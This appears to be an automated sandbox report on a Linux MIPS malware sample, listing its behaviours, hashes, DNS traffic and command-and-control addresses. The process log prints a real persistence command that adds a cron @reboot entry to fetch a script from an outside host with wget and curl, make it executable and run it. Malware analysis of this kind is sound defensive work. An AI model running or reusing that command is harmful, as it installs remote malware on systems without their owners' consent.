Analysis Overview
SHA256
9cb34a4c41186002a0d523d847cf95c4e099ac6c61a03888ad9e58e303be1d8f
Threat Level: Shows suspicious behavior
The file 2bc1855eb4297c28116e412b6705e14a.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
Renames itself
Unexpected DNS network traffic destination
File and Directory Permissions Modification
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 01:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 01:07
Reported
2024-10-28 01:10
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 139.84.165.176 | N/A | N/A |
| Destination IP | 185.181.61.24 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.22OlBk | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | mini_httpd | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A |
Reads runtime system information
Processes
/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| IN | 139.84.165.176:53 | kingstonwikkerink.dyn | udp |
| NO | 185.181.61.24:53 | kingstonwikkerink.dyn | udp |
| GB | 91.149.238.18:15088 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.22OlBk
| MD5 | 7f870874f6e2e8a519bfb12fd9595bae |
| SHA1 | a06aa499becd5f448356d6dcd76441142f5f4142 |
| SHA256 | 09cfd32d5d70dceebe59d6eecc03de39f65428f59b214c62dea20d331085c51d |
| SHA512 | f05c5887976e1e645d3b82d48f1492b24ef680e54483625d8eecc912ea4d38c36db62d9296bff4e3b1f418e7e50cde9c5083d685e77860c61372b19a6c06d620 |